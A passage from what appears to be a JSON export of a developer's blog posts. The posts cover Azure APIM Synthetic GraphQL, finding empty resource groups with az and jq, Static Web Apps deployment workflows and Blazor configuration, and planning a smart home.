under a certain tag. You can see the implementations on my GitHub, but they’re reasonably simple, here’s the /tag/:tag one:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 import { AzureFunction, Context, HttpRequest } from "@azure/functions"; import { loadPosts } from "../postLoader"; const httpTrigger: AzureFunction = async function ( context: Context, req: HttpRequest ): Promise<void> { const tag = req.params.tag; const posts = await loadPosts(); const postsByTag = posts.filter((p) => p.tags.some((t) => t === tag)); if (!postsByTag.length) { context.res = { status: 404, }; } else { context.res = { body: postsByTag, }; } }; export default httpTrigger; Simple, effective, and if you go to /api/tag/graphql you’ll see a JSON response containing all my blog posts that are tagged with graphql.\nCreating a GraphQL schema Let’s go ahead and define a GraphQL schema that we want to expose the REST endpoints via:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 scalar Url scalar Date type Post { id: ID! title: String! url: Url! date: Date tags: [String!]! description: String content: String! } type Query { post(id: ID!): Post postsByTag(tag: String!): [Post!]! } schema { query: Query } That looks like it’ll do, we have a single Object Type, Post, that has the relevant fields on it, we have some queries, post(id: ID!) and postsByTag(tag: String!) that cover the main REST endpoints, and we’ve even got some custom scalar types in there for fun.\nNow let’s go and create an APIM endpoint that we can use for this.\nSetting up Synthetic GraphQL Note: At the time of writing, Synthetic GraphQL is in public preview, so the approach I’m showing is subject to change as the preview moves towards General Availability (GA). Also, it may not be in all regions or all SKUs, so for this post I’m using West US as the region and the Developer SKU.\nFirst off, you’ll need to create an APIM resource, here’s how to do it via the Azure Portal (the APIM docs will cover other approaches (CLI, Bicep, VS Code, etc.)). 
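If you'd rather script the resource creation, a minimal CLI sketch would be something along these lines (the names here are placeholders, and be warned that the Developer SKU can take a long time to provision):
# Hypothetical names - adjust to suit your own subscription
az group create --name synthetic-graphql-demo --location westus
az apim create --name my-synthetic-graphql \
    --resource-group synthetic-graphql-demo \
    --publisher-name "My Blog" \
    --publisher-email you@example.com \
    --sku-name Developer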
Once the resource has been provisioned, it’s time to setup our Synthetic GraphQL API.\nOn the APIM resource, navigate to the APIs section, click Add API and you’ll see the different options, including Synthetic GraphQL.\nSelect Synthetic GraphQL, provide a name and upload your GraphQL schema then click Create (you don’t need to provide the other information if you don’t want, but I have provided an API URL suffix, so I could run other APIs in this resource if so desired).\nYou’ll now find a new API listed with the name provided (Blog in my case) and if you click on it you’ll find your GraphQL schema parsed as the API frontend.\nCongratulations, you’ve setup a GraphQL endpoint in APIM!\nDefining Resolvers While we may have told APIM that we want to create an endpoint that you can query with GraphQL, we’re missing a critical piece of the puzzle, resolvers! APIM knows that we are trying to get GraphQL but it doesn’t know how to get the data to send back in your HTTP responses, and for that, we’ll use the set-graphql-resolver APIM policy to, well, set a GraphQL resolver for parts of our schema.\nThe set-graphql-resolver policies are added to the <backend> section of our APIM policy list and it will require a parent-type and the field that the resolver is for. Let’s start by defining the post(id: ID!) field of the Query, and we’ll do that by opening the Policy Editor for our API:\nFrom here, find the <backend> node and start creating our policy:\n1 2 3 4 5 <backend> <set-graphql-resolver parent-type="Query" field="post"> </set-graphql-resolver> <base /> </backend> Note: We’ll leave the <base /> policy in as well, as that will ensure any global policies on our API are also executed.\nWith the policy linked to the GraphQL schema, we need to “implement” the resolver and tell it to call our HTTP endpoint, and for that we’ll use the http-data-source:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 <backend> <set-graphql-resolver parent-type="Query" field="post"> <http-data-source> <http-request> <set-method>GET</set-method> <set-url>@{ var id = context.Request.Body.As<JObject>(true)["arguments"]["id"]; return $"https://www.aaron-powell.com/api/post/{id}"; }</set-url> <set-header name="Content-Type" exists-action="override"> <value>application/json</value> </set-header> </http-request> </http-data-source> </set-graphql-resolver> <base /> </backend> For our http-data-source, we’ll define the http-request information, in this case we’re setting the HTTP method as GET and that we’re expecting JSON as the Content-Type header, but the most interesting bit is the set-url node, in which we define the URL that our HTTP call will make.\nSince the posts field takes an argument of id, and that’s needed in our API call, we run a code snippet that will parse the request body, find the arguments property and get the id member of it, which we assign to a variable and then generate the URL that APIM will need to call. 
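To make that concrete, a query along these lines (using the id of one of my own posts) ends up being translated by the resolver into a GET against the matching REST endpoint:
# This query…
query {
  post(id: "2022-08-16-graphql-on-azure-part-9-rest-to-graphql") {
    title
    tags
  }
}
# …becomes a GET to https://www.aaron-powell.com/api/post/2022-08-16-graphql-on-azure-part-9-rest-to-graphql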
While this is a simple case of passing something across as a URL parameter, you could do something more dynamic like conditionally choosing a URL based on the arguments, or if it was a HTTP POST you could use set-body to build up a request body to POST to the API (which might be more applicable in a mutation than a query).\nLet’s repeat the same thing for our postsByTag field:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 <backend> <set-graphql-resolver parent-type="Query" field="post"> <http-data-source> <http-request> <set-method>GET</set-method> <set-url>@{ var id = context.Request.Body.As<JObject>(true)["arguments"]["id"]; return $"https://www.aaron-powell.com/api/post/{id}"; }</set-url> <set-header name="Content-Type" exists-action="override"> <value>application/json</value> </set-header> </http-request> </http-data-source> </set-graphql-resolver> <set-graphql-resolver parent-type="Query" field="postsByTag"> <http-data-source> <http-request> <set-method>GET</set-method> <set-url>@{ var tag = context.Request.Body.As<JObject>(true)["arguments"]["tag"]; return $"https://www.aaron-powell.com/api/tag/{tag}"; }</set-url> <set-header name="Content-Type" exists-action="override"> <value>application/json</value> </set-header> </http-request> </http-data-source> </set-graphql-resolver> <base /> </backend> Once you’re done, hit Save and navigate to the Test console for the API and we’ll be able to execute our queries:\nAnd there we have it, we’ve created a GraphQL API that is really just fronting our existing REST API.\nMaking our GraphQL endpoint callable The only thing left to do is to make our GraphQL endpoint callable by clients. There’s an easy to follow tutorial on the APIM docs (which I followed myself!) and I setup a Product like so:\nOnce the product was setup, I added a subscription for myself, copied the subscription key, opened up Postman and executed a query.\nConclusion Throughout this post, we’ve looked at how to create a Synthetic GraphQL API using Azure APIM Management, aka APIM, that is a wrapper around a REST API that I already had existing on my website.\nWe defined a set-graphql-resolver policy on the API backend that told APIM how to convert the GraphQL query into a REST call, and sent it to the API.\nSince the way we defined our schema doesn’t require us to do any transformation of the returned data, our REST and GraphQL types are matching, we didn’t need to do any additional processing with the http-response part of the set-graphql-resolver, but if you need to change the returned data structure, add additional headers, or any other response manipulations, you can use that to do it.\nHopefully this has shown you just how easy it is to provide a GraphQL interface over a HTTP backend, without having to write a full GraphQL server to do it.\nIf you do have a go with this, I’d love to hear how you find it.\n", "id": "2022-08-16-graphql-on-azure-part-9-rest-to-graphql" }, { "title": "Finding Resource Groups With No Resources", "url": "https://www.aaron-powell.com/posts/2022-08-15-finding-resource-groups-with-no-resources/", "date": "Mon, 15 Aug 2022 06:27:02 +0000", "tags": [ "azure" ], "description": "Always good to keep your subscriptions clean, but how do you know what's not needed", "content": "I have a lot of resources and a lot of Azure subscriptions, and as a result, often find that I’m forgetting what everything is used for. 
Sure, I try to name the resource groups something useful, add tags, and things of that nature, but even still, things can get out of control quickly. For example, I have 47 resource groups in my primary subscription at the moment (let along me second and tertiary ones).\nI figured a good start would be to delete all the resource groups that don’t have any resources in them. No resource? well, it’s probably not one that I need anymore (I likely deleted some expensive resource but didn’t do the full cleanup).\nBut how do we find those, short of clicking through the portal?\nWell, let’s start with shell.azure.com and start scripting.\nTo do this task, there’s two bits of information we’ll need, the names of all resource groups and the count of items in those resource groups.\nGetting the names of all resource groups is simple:\n1 az group list | jq 'map(.name)' This will output:\n1 2 3 4 5 6 7 8 9 [ "aaron-cloud-cli", "dddsydney", "httpstatus", "personal-website", "restream-streamdeck", "NetworkWatcherRG", "stardust-codespace" ] Unfortunately, this won’t tell you how many resources are in a group (yes, we are only getting the name property, but the whole JSON doesn’t contain it). In fact, you can’t get that with az group at all, even az group show --name <name> won’t give you it, we’ll have to tackle this differently, instead we’ll get all resources and group them by their resource group, which we can do with az resource list:\n1 az resource list | jq 'map(.resourceGroup) | group_by(.) | map({ name: .[0], length: length }) | sort_by(.length) | reverse' This jq command is a bit complex, but if we break it down, the first thing we’re doing is selecting the resource group name from each resource with map(.resourceGroup), to give us an array of resource group names. Next, we use group_by(.) to group them together and pipe that to another map function that makes an object with the name of the resource group (obtained from the first item of the index) and the length (how many resources are in the resource group). Lastly, it just sorts and orders it with sort_by and reverse, giving us this output:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 [ { "name": "httpstatus", "length": 11 }, { "name": "personal-website", "length": 3 }, { "name": "stardust-codespace", "length": 1 }, { "name": "restream-streamdeck", "length": 1 }, { "name": "dddsydney", "length": 1 }, { "name": "aaron-cloud-cli", "length": 1 } ] Great! Except… it only contains resource groups that have resources, meaning we know what resource groups have items, when we want the inverse, we want the ones that don’t have items.\nSo, we will need that original query to get all the resource group names and we’ll find the negative intersection between the two arrays, with the leftovers being the resource groups we can discard.\nStart by pushing all resource groups with items into a bash variable:\n1 RG_NAMES=$(az resource list | jq -r 'map(.resourceGroup) | group_by(.) | map(.[0])') Next, we’ll use $RG_NAMES as a substitution into a query against az group list:\n1 az group list | jq -r "map(.name) | map(select(. as \\$NAME | $RG_NAMES | any(. == \\$NAME) | not)) | sort" Again, let’s break this more complex jq statement down. We start with getting the names of the resource groups (since it’s all we need) with map(.name). That is then piped to a map call so we can operate on each item of the array. 
In the second map we assign the item to a variable $NAME (which we’ve escaped since we’re doing substitution with the environment variable $RG_NAMES), then pipe in the $RG_NAMES variable so we can use any to see if any item in $RG_NAMES matches $NAME. The result of the any is inverted by piping through not, and the result is provided to select, filtering the resource group names down to only those that didn’t have resources!\n["NetworkWatcherRG"] And there we have it, we’ve successfully executed two lines of code and got back the resource groups that are empty and can be deleted.\nSummary Here are those two lines again:\nRG_NAMES=$(az resource list | jq -r 'map(.resourceGroup) | group_by(.) | map(.[0])') az group list | jq -r "map(.name) | map(select(. as \\$NAME | $RG_NAMES | any(. == \\$NAME) | not)) | sort" Yes, the jq can look a bit daunting, especially considering how many pipes they are executing, but all in all, it does what’s advertised and returns a list of resource groups that contain no items.\nAnd yes, I may have spent more time trying to figure this out than it would have been clicking through them all, but hey, at least I have it ready for next time! 🤣\n", "id": "2022-08-15-finding-resource-groups-with-no-resources" }, { "title": "Fixing When SWA Pull Request Builds Can't Add Comments", "url": "https://www.aaron-powell.com/posts/2022-08-09-fixing-when-swa-prs-cant-add-comments/", "date": "Tue, 09 Aug 2022 00:08:41 +0000", "tags": [ "azure", "javascript", "devops" ], "description": "Custom SWA deployments can cause problems with adding PR comments, but it's an easy fix", "content": "I did a recent post about deploying SWA with Bicep and another on advanced GitHub Actions workflows for SWA, but I noticed when doing it that when using PRs on the repo I was no longer getting the comment added to the PR for where the staging site lives. 
When it’s working correctly you’ll get a comment like this:\nInstead, I’d get an error message in my logs:\nUnexectedly failed to add GitHub comment.\nThis doesn’t give you a lot to go on to find the problem, so I reached out to the SWA engineering team to do some debugging and see if we could get to the bottom of it.\nPermissions, permissions, permissions As I mentioned in the deploying with Bicep post, you’ll need to authenticate against Azure, and I prefer the OpenID Connect (OIDC) approach, and in doing so, you need to configure the permissions of the GITHUB_TOKEN to enable id-token write.\nAnd here’s where the GitHub SWA integration broke.\nWhat I missed in the docs is that these are replacement permissions, not additive permissions, meaning if you set the token permissions in the workflow you only have those permissions.\nDon’t worry though, it’s an easy fix: you need to add pull-requests: write permissions to the token and then you’ll be good to go.\nCheck out this commit in my blog repo to see the changed permissions (I also moved the permissions to be set per job rather than per workflow).\nSummary It’s a good idea to know what permissions are needed in the workflows and at what point they are needed, so you can maintain a policy of minimum trust in your deployments.\nFor SWA, you need to ensure you have pull-requests: write set on your GITHUB_TOKEN permissions if you’re modifying the permissions and still want the Action to add comments on PRs.\n", "id": "2022-08-09-fixing-when-swa-prs-cant-add-comments" }, { "title": "Building a Smart Home - Part 2 Where to Start", "url": "https://www.aaron-powell.com/posts/2022-07-26-building-a-smart-home---part-2-where-to-start/", "date": "Tue, 26 Jul 2022 01:10:46 +0000", "tags": [ "HomeAssistant", "smart-home" ], "description": "Sensors, lights, plugs, switches, wifi, ZigBee, Z-Wave, oh my...", "content": "When it comes to smart home stuff there are so many things to look at. You can control lights and climate, have smart appliances, play music in response to actions, have a camera doorbell respond to movement, and the list goes on. This can make it very daunting when getting started and can result in decision paralysis, so you never start.\nAnd that’s not even accounting for the cost of any hardware you’re buying, only to then not do anything with it!\nWhere to start As I’m getting started on my journey, this is a question I asked myself - where would I start?\nNaturally, the answer to this will be different for everyone, as everyone’s home is different and everyone’s needs are different, but here are a few decisions that I went through in trying to work out where to start.\nDefine the problems To start exploring the smart home space, I sat down and looked at what problems I was trying to solve.\nAs I mentioned in the first post on designing a smart home, the “smarts” of the home shouldn’t get in the way of the expected operation. 
A light switch should still switch a light, so I looked at the things that worked but could work better.\nFrom this I came up with a short list of problems:\nForgetting the washing machine was done to hang the laundry out It was cold downstairs in the morning, I’d like it to warm up before we get down Kids not turning off the TV when asked/screen time was up Ensuring the house/garage are locked up when we leave Coming home with the kids after dark and getting them upstairs to bed while asleep Solving any of these problems with a smart home wouldn’t be revolutionary by any means, but it would help improve our families quality of life, and that’s where I see a smart home really coming into play.\nThe tech As a technologist, this is really the thing I wanted to get stuck into - who doesn’t love buying new tech to play with!\nBut the kind of problems I described above can be solved in many different ways, and then you’ve got different protocols to look at, wifi, ZigBee, Z-Wave, Bluetooth, and so on.\nI’ve already decided that I’ll be using Home Assistant as the core of my solution, so I needed to explore options that would integrate with it in the simplest way possible.\nBut since this is a DIY solution, nothing will be simple so it’s a good idea to start small, buy only one of a device and test it out, before committing to a fleet of them - this saved me on a recent purchase, I found a power monitoring double plug but it turned out to only report the overall plug usage, not a per-outlet reading, which is what I wanted. Thankfully, I’d only bought one of them (around $30) and was able to return it, but even if I couldn’t return it, $30 is a lot easier a cost to swallow than the amount it would’ve been if I got as many as I ultimately want to deploy.\nSummary That comes to the end of this post, I’ve got a few ideas of things that I’d like to improve upon their current (non-smart) solutions to improve quality of life.\nAnd that’s how I see getting longevity out of this hobby, solving things I actually want solved, rather than just tinkering and hoping the coolness factor doesn’t wear off.\nIn the next post, we’ll move on from theory and start tackling one of these problems.\n", "id": "2022-07-26-building-a-smart-home---part-2-where-to-start" }, { "title": "Controlling Blazor Environments on Static Web Apps", "url": "https://www.aaron-powell.com/posts/2022-07-22-controlling-blazor-environments-on-swa/", "date": "Fri, 22 Jul 2022 06:29:21 +0000", "tags": [ "azure", "web", "dotnet" ], "description": "Deploying Blazor to SWA but want different config per-environment? Here's how to do it", "content": "Like all good problems, it started with a tweet:\nJT is trying to run a Blazor application, using appsettings.json but load a different one depending on what environment is being deployed to. Given that Blazor has the feature built in to load different configs based on the ASPNETCORE_ENVIRONMENT environment variable, it’s something that is doable, but how do we do it?\nUnderstanding Static Web Apps config On SWA we have application configuration and you might think this is the starting point for what you want to do. 
But that’s not quite right - this is actually used to control the configuration of the Azure Functions backend that you use, not the frontend of your application.\nIn fact, there’s no way to directly control the client “environment” once it’s deployed, as the application is built before it gets to Azure - that’s one of the jobs of the GitHub Actions step, azure/static-web-apps-deploy (or you can do it yourself like I showed here). So generally speaking, if you want to inject “environment” information, you have to do it at build time.\nBlazor app settings The caveat to that last statement is that Blazor doesn’t quite work like that - it will load the appsettings.json file at runtime (you’ll see it in the network tab of the browser devtools), so how do we control that?\nWell, digging through the Blazor docs, I came across this page and it shows there are two ways to control the environment of the Web Assembly application, either via manually starting the Blazor application, or via a custom header.\nPersonally, I think the header approach is the better of the two, as it doesn’t require a code change to the files generated by Blazor, but I do wish it was an X- header, given it’s not a standard header.\nCustomizing headers in SWA So, we’re going to want to customize the headers of the SWA application, and we can do that with the staticwebapp.config.json file with the following:\n{ "globalHeaders": { "Blazor-Environment": "<your environment here>" } } Add this file to your repo (or add the globalHeaders section to your existing config file) and add some transformation logic to set the environment value during build and deploy!\nNote - if you don’t want to do it on all requests, you can use the headers section of an individual route, but I found it’s easier to do it globally.\nSummary And with that, we can control the Blazor environment on our SWA application.\nBy using the staticwebapp.config.json file we’re able to set the custom header that Blazor needs to know what environment it’s running under, and control the settings that the WASM application will load up when it runs.\n", "id": "2022-07-22-controlling-blazor-environments-on-swa" }, { "title": "Taking a SWA DevOps pipeline to the next level", "url": "https://www.aaron-powell.com/posts/2022-07-20-taking-a-swa-devops-pipeline-to-the-next-level/", "date": "Tue, 19 Jul 2022 06:53:33 +0000", "tags": [ "azure", "devops" ], "description": "The default SWA pipeline is a good starting point, but let's look at how to split it up more.", "content": "One of the things I like most about Azure Static Web Apps, aka SWA, is that it generates a GitHub Actions workflow file for you, ensuring that you’ve got a CI/CD pipeline that will deploy the code as you push changes, making repeatable deployments happen by design. 
If you’re not using GitHub Actions, no problems, you can use Azure Pipelines, GitLab, Bitbucket, or the newly release cli deploy command and achieve the same repeatable workflow rather than falling back to copying files to a remote server.\nFor this post, I’ll be using GitHub Actions, as that’s what I’m using for my blog (which this article is based off), but the patterns will be the same for other build platforms.\nTo refresh, or for those who aren’t familiar with SWA, here’s the job that gets generated which will build and deploy your application to Azure:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 build_and_deploy_job: if: github.event_name == 'push' || (github.event_name == 'pull_request' && github.event.action != 'closed') runs-on: ubuntu-latest name: Build and Deploy Job steps: - uses: actions/checkout@v2 with: submodules: true - name: Build And Deploy id: builddeploy uses: Azure/static-web-apps-deploy@v1 with: azure_static_web_apps_api_token: ${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN }} repo_token: ${{ secrets.GITHUB_TOKEN }} # Used for GitHub integrations (i.e. PR comments) action: "upload" ###### Repository/Build Configurations ###### app_location: "src" # App source code path relative to repository root api_location: "api" # Api source code path relative to repository root - optional output_location: "public" # Built app content directory, relative to app_location - optional ###### End of Repository/Build Configurations ###### The really important part of this is the Build And Deploy job as it’s responsible for two tasks, building the front end (and Functions API if it exists), then uploading it to Azure.\nWhile this workflow will cover many use cases, it’s possible to want to grow beyond it. Maybe you’re wanting to run tests as part of the pipeline, or you want to add an approval process for the deployment, or anything else that means that combining the build phase with the deploy phase can make it difficult.\nGoing beyond the default Let’s look at going beyond the default, and to illustrate a complex GitHub Actions pipeline that ultimately deploys to SWA:\nThis is a picture of the workflow for my blog and it consists of seven jobs to be run with nearly 40 steps run across them all. Some of these jobs run in parallel, some are run in sequence, but all-in-all, this is how I deploy my blog.\nSo, why is it so complicated? Well, my website is made up for three different platforms, Hugo for the blog itself, .NET for the Blazor powered search and TypeScript for the API (which I’ll blog about separately soon). Because of this, the standard SWA action won’t work; it doesn’t know what to build!\nBecause of this, I have three primary parallel jobs, build_hugo, build_api, and build_search_ui and each of these will generate artifacts to be deployed. For the post, I’ll document a much simpler process, but you can view my full (and maybe overly complex…) workflow at build-and-deploy.yml.\nBuild first, deploy later The first thing we’re going to want to do is split the build phase out from the rest of the pipeline. 
The actual steps you’ll run in GitHub Actions will depend on what you’re building, let’s go with a JavaScript application:\n1 2 3 4 5 6 7 8 9 10 11 12 job: build: if: github.event_name == 'push' || (github.event_name == 'pull_request' && github.event.action != 'closed') runs-on: ubuntu-latest environment: build steps: - uses: actions/checkout@v3 - uses: actions/setup-node@v3 with: node-version: 16 - run: npm ci - run: npm run build The important part here is to know where the output will go, and in this case we’re just assuming that it’s in the build folder of this hypothetical application.\nBut how do we get them later? By turning them into an artifact of the job, using the actions/upload-artifact Action:\n1 2 3 4 5 - name: Publish website output uses: actions/upload-artifact@v3 with: name: website path: ${{ github.workspace }}/build This will package the output contents of our build step and upload it to the workflow that we can use later on.\nArtifacts with lots of files If you’re working with an output that will contain a lot of files, such as a node_modules folder (because it’s a non-bundled application), you might want to package them into an archive and then upload that archive (like I do with my API):\n1 2 3 4 5 6 7 8 9 10 - run: npm ci - run: npm run build - run: mkdir ${{ github.workspace }}/${{ env.OUTPUT_FOLDER }} - run: tar -cvf ${{ github.workspace }}/${{ env.OUTPUT_FOLDER }}/api.tar . - name: Publish API output uses: actions/upload-artifact@v1 with: name: api path: ${{ github.workspace }}/${{ env.OUTPUT_FOLDER }}/api.tar This is because when uploading, it’ll do it file-by-file upload and when there’s a lot of files this can take a looooooong time (thus making builds slower), but if we create an archive, it’ll upload just a single file, which is a lot less IO.\nDeploying from artifacts Now that we’ve split out our build phase from the SWA Action, how to do we use it?\nStart by defining a new job in our workflow, deploy, and add a needs section to it saying that it needs the build job to complete first, otherwise this job will run in parallel and we can’t deploy until we’ve built!\n1 2 3 4 5 6 7 8 9 job: build: # snip deploy: runs-on: ubuntu-latest environment: production needs: [build] steps: # todo Unlike the build job, we’re not going to need actions/checkout, because we’re not needing the source code for our application, we’re going to use the prebuilt artifact, which we get from actions/download-artifact:\n1 2 3 4 5 6 7 8 9 10 11 12 13 job: build: # snip deploy: runs-on: ubuntu-latest environment: production needs: [build] steps: - name: Download website uses: actions/download-artifact@v1 with: name: website path: ${{ github.workspace }} Specify anywhere that you want the artifact to be downloaded to. In this case, we’ll put it on the root of the agent, since we know it’s a new agent for this job, there’s no other files that we need to worry about.\nNext up, we’ll bring in the azure/static-web-apps-deploy Action so that we can deploy to Azure:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 job: build: # snip deploy: runs-on: ubuntu-latest environment: production needs: [build] steps: - name: Download website uses: actions/download-artifact@v1 with: name: website path: ${{ github.workspace }} - name: Build And Deploy id: builddeploy uses: Azure/static-web-apps-deploy@v1 with: azure_static_web_apps_api_token: ${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN }} repo_token: ${{ secrets.GITHUB_TOKEN }} # Used for GitHub integrations (i.e. 
PR comments) action: "upload" ###### Repository/Build Configurations ###### app_location: "" # App source code path relative to repository root api_location: "api" # Api source code path relative to repository root - optional skip_app_build: true ###### End of Repository/Build Configurations ###### There’s two secrets needed, the GITHUB_TOKEN, which is provided by GitHub and AZURE_STATIC_WEB_APPS_API_TOKEN, which is the deployment token that’s generated when you first connect the repo to SWA, can be obtained via the portal, or via the Azure CLI (and that I was leaking in my logs, prompting this blog post).\nThe other parameters we need to change for the action is that we’ll set the app_location to the place relative to the ${{ github.workspace }} (which is empty in our case) and then set skip_app_build to true, since we’ve already built, all we need to do is deploy.\nSummary And with that, we have a completed, multi-stage workflow that looks like this to build and deploy SWA (I’ve excluded the triggers for simplicities sake):\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 job: build: if: github.event_name == 'push' || (github.event_name == 'pull_request' && github.event.action != 'closed') runs-on: ubuntu-latest environment: build steps: - uses: actions/checkout@v3 - uses: actions/setup-node@v3 with: node-version: 16 - run: npm ci - run: npm run build - name: Publish website output uses: actions/upload-artifact@v3 with: name: website path: ${{ github.workspace }}/build deploy: runs-on: ubuntu-latest environment: production needs: [build] steps: - name: Download website uses: actions/download-artifact@v1 with: name: website path: ${{ github.workspace }} - name: Build And Deploy id: builddeploy uses: Azure/static-web-apps-deploy@v1 with: azure_static_web_apps_api_token: ${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN }} repo_token: ${{ secrets.GITHUB_TOKEN }} # Used for GitHub integrations (i.e. 
PR comments) action: "upload" ###### Repository/Build Configurations ###### app_location: "" # App source code path relative to repository root api_location: "api" # Api source code path relative to repository root - optional skip_app_build: true ###### End of Repository/Build Configurations ###### We’ve seen how we can use artifacts to move the output from one job to another, allowing for a clearly defined build and deploy phases within our workflow.\nWith this customisation, we can introduce any additional steps to the workflow that we want, such as running tests, deploying SWA with Bicep, or running parallel jobs to speed up a workflow run.\nI have a much more complex form of this running my blog which you can see in my workflow at build-and-deploy.yml.\nBonus - splitting PR management SWA will automatically generate a preview environment from a PR, and part of that requires a second job to cleanup when the PR is closed:\n1 2 3 4 5 6 7 8 9 10 11 close_pull_request_job: if: github.event_name == 'pull_request' && github.event.action == 'closed' runs-on: ubuntu-latest name: Close Pull Request Job steps: - name: Close Pull Request id: closepullrequest uses: Azure/static-web-apps-deploy@v1 with: azure_static_web_apps_api_token: ${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN }} action: "close" This job is included in the generated workflow file and because of that we have some if checks on the jobs, as the workflow trigger is on PR’s but we need to selectively run jobs depending on what the event that triggered the PR is.\nBut we can split this up as well, so we have a “close PR” workflow that’s independent from our “build and deploy” job, and we can do that by modifying the triggers for the workflow.\nLet’s start with our build and deploy workflow:\n1 2 3 4 5 6 7 8 on: push: branches: - main pull_request: types: [opened, synchronize, reopened] branches: - main This workflow will still run on PR, but it’ll only run if the PR is opened, synchronized (files are pushed to it), or reopened. 
This means we can remove the if check from our build job.\nNext, create another workflow file and move the close_pull_request_job across:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 name: Close PR on: pull_request: types: [closed] branches: - main jobs: close_pull_request_job: runs-on: ubuntu-latest name: Close Pull Request Job environment: production steps: - name: Close Pull Request id: closepullrequest uses: Azure/static-web-apps-deploy@v1 with: azure_static_web_apps_api_token: ${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN }} action: "close" This one is only triggered on the closed event for a PR, and runs a single step to destroy the preview environment.\nSure, it means there’s an additional workflow file that you have (and some potential for duplicated code), but I prefer the cleaner view of it and that it’s clear which workflows will run when.\n", "id": "2022-07-20-taking-a-swa-devops-pipeline-to-the-next-level" }, { "title": "Building a Smart Home - Part 1 Design", "url": "https://www.aaron-powell.com/posts/2022-07-18-building-a-smart-home---part-1-design/", "date": "Mon, 18 Jul 2022 05:28:52 +0000", "tags": [ "HomeAssistant", "smart-home" ], "description": "I'm building a smart home, so come join my journey", "content": "In the middle of 2020, while the COVID pandemic was really hitting full steam, my wife and I made a decision, we’d demolish our house and build a new one, seems like the perfect time!\nWell, about 6 weeks ago, we moved into our new house and it was time for me to tackle the thing I’d been hanging out to do, making this into a smart home.\nSo with this happening, I’m going to kick off a new series on my blog, sharing my journey in building a smart home.\nBecause we’ve built this home from scratch I was able to take a lot of inspiration from what I’ve been seeing people doing online when it comes to their smart homes and incorporate it into my plans.\nHuman-centred design From following people online, the first thing that I did was plan, plan what it was that we were going to do with the house, and to do that I tackled this with a human-centred design.\nFor our house there’s 4 primary users with a range of technical skills (from myself to my 4 year old), with a range of secondary users such as our parents and friends. With this in mind, how do we make a smart home?\nThe home will only be as smart as it’s dumbest user. You see, over the years the design of every day items have been iterated on and people have built expectations based of that design. Dan Norman wrote a book called The Design of Everyday Things which culminated in the term Norman Doors.\nBut how does this apply to a smart home? If we think about the kinds of things we can add some intelligence to, lights are a common starting point but are also an easy way to break expected design. If I can walk up to a light switch and flip it to change the state, it’s not smart, it’s a broken design.\nAfter all, our house shouldn’t require a manual to live in and operate.\nAs an aside - we do have something that I would put in this category of poor design, our fans. We put fans in each of our bedrooms and they are a broken user experience. There’s a switch on the wall and it’ll turn on the light in the fan, and we have a remote to turn the fan on/adjust speed. Then if you turn off the switch the light goes off… and so does the fan 😒. 
Turns out the switch controls power to the whole circuit, not just the light, so if you want the fan on you have to flip the switch, turn it on with the remote then use the remote to turn off the light, which isn’t great in summer and you want to turn the fan on during the night (we had the same ones in the place we rented, so we’re familiar with them). I’ll talk about solving that in a future post.\nWhat’s smart then So how do we make a house smart while not breaking the expectations that we have as users?\nTo achieve this, I’m going to be tackling it from a progressive enhancement point of view. Take our light switch example, a light switch should still operate as a light switch, but it should also be adaptive to our needs. If I’m watching a movie in the media room, it should adjust the lighting accordingly.\nThe tech Right now, we’re still in the early stages of “smartening” the house, so the tech aspect of it is basic, but there are two core pieces to it, first is Google Home. My wife and I are both Android phone users, so we use Google Assistant a bit, and for a few years we’ve had some Google Home/Nest speakers to set timers/play music/etc., so it makes sense for that to be the primary user interface.\nFor the brains of the operation, I’m using Home Assistant as a hub, running on a Raspberry Pi 4 (HAOS install - the Pi 4 is dedicated for Home Assistant). I originally experimented with a Pi 3a for running Home Assistant, but kept finding that I was running out of memory on the device, so I upgraded to a Pi 4.\nI also configured it to boot from USB, rather than the SD card (which is the default), so you don’t have to worry about the write-lifetime (I fried an SD card while experimenting and lost a whole setup).\nNetworking The other part of my plans was how to tackle networking. Since moving out of home, I’ve always seemed to deal with shit wifi. I’ve built hodgepodge systems of routers with bridging access points, Ethernet over Power bridges, strung ethernet cables, and they’ve always been, at the best, ok.\nSince we’re building from scratch I decided to do this right, and that meant running CAT6a everywhere of importance, then having access points covering the aspects of our house. Basically, if the device won’t move (TV, desktop PC, etc.) it should get ethernet, otherwise it can use wifi.\nWith our new house the NBN connection comes into the garage, with two downstairs living spaces (one at each end of the floor), an upstairs living space, as well as a home office. These were the points deemed necessary to have ethernet, as then I can run a cable to each TV, as well as to my home office.\nI’ve gone with Unifi products (while they are more expensive, I’m happy to be in the prosumer market) and have a setup consisting of a Unifi Dream Machine (UDM) - NBN comes into that, a USW Lite 16 port PoE switch and 3 InWall HD’s (one behind each TV). The garage has an 8 ports going out to the house, which go to our TV’s, 2 to my office, 1 to my wife’s office and 2 external for cameras.\nIn total, we have 32 ethernet ports across the UDM, Lite 16 and InWall HD’s (in reality, less as the Lite 16 runs the InWall’s), and that gives me plenty of ports to run everything where they need to be.\nIs it overkill? Probably. Do I get full signal strength everywhere in the house? Absolutely.\nPower The other thing to plan for when designing for a smart home is power. 
